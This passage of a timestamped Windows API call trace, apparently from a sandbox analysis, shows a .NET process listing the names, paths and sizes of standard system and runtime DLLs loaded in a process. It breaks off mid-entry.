1 [0108.865] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.865] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0108.866] CoTaskMemFree (pv=0x6b7648) [0108.866] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.866] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0108.866] CoTaskMemFree (pv=0x6b7648) [0108.866] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x2504cf0, cb=0xc | out: lpmodinfo=0x2504cf0*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0108.866] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.866] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0108.867] CoTaskMemFree (pv=0x6b7648) [0108.867] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.867] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0108.867] CoTaskMemFree (pv=0x6b7648) [0108.867] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x2506dfc, cb=0xc | out: lpmodinfo=0x2506dfc*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0108.867] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.867] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0108.868] CoTaskMemFree (pv=0x6b7648) [0108.868] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.868] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0108.868] CoTaskMemFree (pv=0x6b7648) [0108.868] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x2508f10, cb=0xc | out: lpmodinfo=0x2508f10*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0108.869] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.869] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0108.869] CoTaskMemFree (pv=0x6b7648) [0108.869] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.869] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0108.869] CoTaskMemFree (pv=0x6b7648) [0108.869] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x250b058, cb=0xc | out: lpmodinfo=0x250b058*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0108.870] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.870] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0108.870] CoTaskMemFree (pv=0x6b7648) [0108.870] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.870] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0108.870] CoTaskMemFree (pv=0x6b7648) [0108.871] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x250d164, cb=0xc | out: lpmodinfo=0x250d164*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0108.871] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.871] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0108.871] CoTaskMemFree (pv=0x6b7648) [0108.871] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.871] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0108.872] CoTaskMemFree (pv=0x6b7648) [0108.872] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x250f278, cb=0xc | out: lpmodinfo=0x250f278*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0108.872] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.872] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0108.873] CoTaskMemFree (pv=0x6b7648) [0108.873] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.873] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0108.873] CoTaskMemFree (pv=0x6b7648) [0108.873] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x2511384, cb=0xc | out: lpmodinfo=0x2511384*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0108.873] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.874] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0108.874] CoTaskMemFree (pv=0x6b7648) [0108.874] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.874] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0108.874] CoTaskMemFree (pv=0x6b7648) [0108.875] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x25134dc, cb=0xc | out: lpmodinfo=0x25134dc*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0108.875] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.875] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0108.875] CoTaskMemFree (pv=0x6b7648) [0108.875] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.876] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0108.876] CoTaskMemFree (pv=0x6b7648) [0108.876] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x25155e8, cb=0xc | out: lpmodinfo=0x25155e8*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0108.876] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.876] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0108.877] CoTaskMemFree (pv=0x6b7648) [0108.877] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.877] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0108.878] CoTaskMemFree (pv=0x6b7648) [0108.878] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x25176f4, cb=0xc | out: lpmodinfo=0x25176f4*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0108.878] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.878] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0108.879] CoTaskMemFree (pv=0x6b7648) [0108.879] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.879] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0108.879] CoTaskMemFree (pv=0x6b7648) [0108.879] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x2519808, cb=0xc | out: lpmodinfo=0x2519808*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0108.880] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.880] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0108.880] CoTaskMemFree (pv=0x6b7648) [0108.880] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.880] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0108.881] CoTaskMemFree (pv=0x6b7648) [0108.881] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x251b93c, cb=0xc | out: lpmodinfo=0x251b93c*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0108.881] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.881] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0108.887] CoTaskMemFree (pv=0x6b7648) [0108.887] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.887] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0108.888] CoTaskMemFree (pv=0x6b7648) [0108.888] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x251da84, cb=0xc | out: lpmodinfo=0x251da84*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0108.888] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.888] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0108.889] CoTaskMemFree (pv=0x6b7648) [0108.889] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.889] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0108.890] CoTaskMemFree (pv=0x6b7648) [0108.890] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x251fb90, cb=0xc | out: lpmodinfo=0x251fb90*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0108.890] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.890] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0108.891] CoTaskMemFree (pv=0x6b7648) [0108.891] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.891] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0108.891] CoTaskMemFree (pv=0x6b7648) [0108.891] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x2521c9c, cb=0xc | out: lpmodinfo=0x2521c9c*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0108.892] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.892] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0108.892] CoTaskMemFree (pv=0x6b7648) [0108.893] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.893] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0108.893] CoTaskMemFree (pv=0x6b7648) [0108.893] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2523e2c, cb=0xc | out: lpmodinfo=0x2523e2c*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0108.894] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.894] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0108.895] CoTaskMemFree (pv=0x6b7648) [0108.895] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.895] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0108.895] CoTaskMemFree (pv=0x6b7648) [0108.895] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x2525f38, cb=0xc | out: lpmodinfo=0x2525f38*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0108.896] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.896] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0108.896] CoTaskMemFree (pv=0x6b7648) [0108.897] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.897] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0108.897] CoTaskMemFree (pv=0x6b7648) [0108.897] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x252803c, cb=0xc | out: lpmodinfo=0x252803c*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0108.898] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.898] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0108.898] CoTaskMemFree (pv=0x6b7648) [0108.898] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.898] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0108.899] CoTaskMemFree (pv=0x6b7648) [0108.899] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x252a168, cb=0xc | out: lpmodinfo=0x252a168*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0108.899] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.899] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0108.900] CoTaskMemFree (pv=0x6b7648) [0108.900] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.900] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0108.901] CoTaskMemFree (pv=0x6b7648) [0108.901] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x252c274, cb=0xc | out: lpmodinfo=0x252c274*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0108.901] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.901] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0108.902] CoTaskMemFree (pv=0x6b7648) [0108.902] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.902] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0108.903] CoTaskMemFree (pv=0x6b7648) [0108.903] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x252e3a4, cb=0xc | out: lpmodinfo=0x252e3a4*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0108.904] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.904] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0108.904] CoTaskMemFree (pv=0x6b7648) [0108.904] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.904] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0108.905] CoTaskMemFree (pv=0x6b7648) [0108.905] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x25304d8, cb=0xc | out: lpmodinfo=0x25304d8*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0108.905] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.905] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0108.906] CoTaskMemFree (pv=0x6b7648) [0108.906] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.906] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0108.907] CoTaskMemFree (pv=0x6b7648) [0108.907] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x2532680, cb=0xc | out: lpmodinfo=0x2532680*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0108.907] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.907] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0108.908] CoTaskMemFree (pv=0x6b7648) [0108.908] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.908] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0108.908] CoTaskMemFree (pv=0x6b7648) [0108.908] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x2534784, cb=0xc | out: lpmodinfo=0x2534784*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0108.909] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.909] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0108.910] CoTaskMemFree (pv=0x6b7648) [0108.910] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.910] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0108.910] CoTaskMemFree (pv=0x6b7648) [0108.910] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x25368c4, cb=0xc | out: lpmodinfo=0x25368c4*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0108.911] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.926] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0108.927] CoTaskMemFree (pv=0x6b7648) [0108.927] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.927] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0108.928] CoTaskMemFree (pv=0x6b7648) [0108.928] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x25389d8, cb=0xc | out: lpmodinfo=0x25389d8*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0108.929] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.929] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0108.929] CoTaskMemFree (pv=0x6b7648) [0108.929] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.929] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0108.930] CoTaskMemFree (pv=0x6b7648) [0108.930] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x253ab74, cb=0xc | out: lpmodinfo=0x253ab74*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0108.931] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.931] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0108.931] CoTaskMemFree (pv=0x6b7648) [0108.931] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.931] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0108.932] CoTaskMemFree (pv=0x6b7648) [0108.932] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x253cd30, cb=0xc | out: lpmodinfo=0x253cd30*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0108.933] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.933] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0108.933] CoTaskMemFree (pv=0x6b7648) [0108.933] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.933] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0108.934] CoTaskMemFree (pv=0x6b7648) [0108.934] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x253ee34, cb=0xc | out: lpmodinfo=0x253ee34*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0108.935] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.935] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0108.935] CoTaskMemFree (pv=0x6b7648) [0108.935] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.935] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0108.936] CoTaskMemFree (pv=0x6b7648) [0108.936] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x2540f38, cb=0xc | out: lpmodinfo=0x2540f38*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0108.937] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.937] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0108.937] CoTaskMemFree (pv=0x6b7648) [0108.937] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.937] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0108.938] CoTaskMemFree (pv=0x6b7648) [0108.938] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, 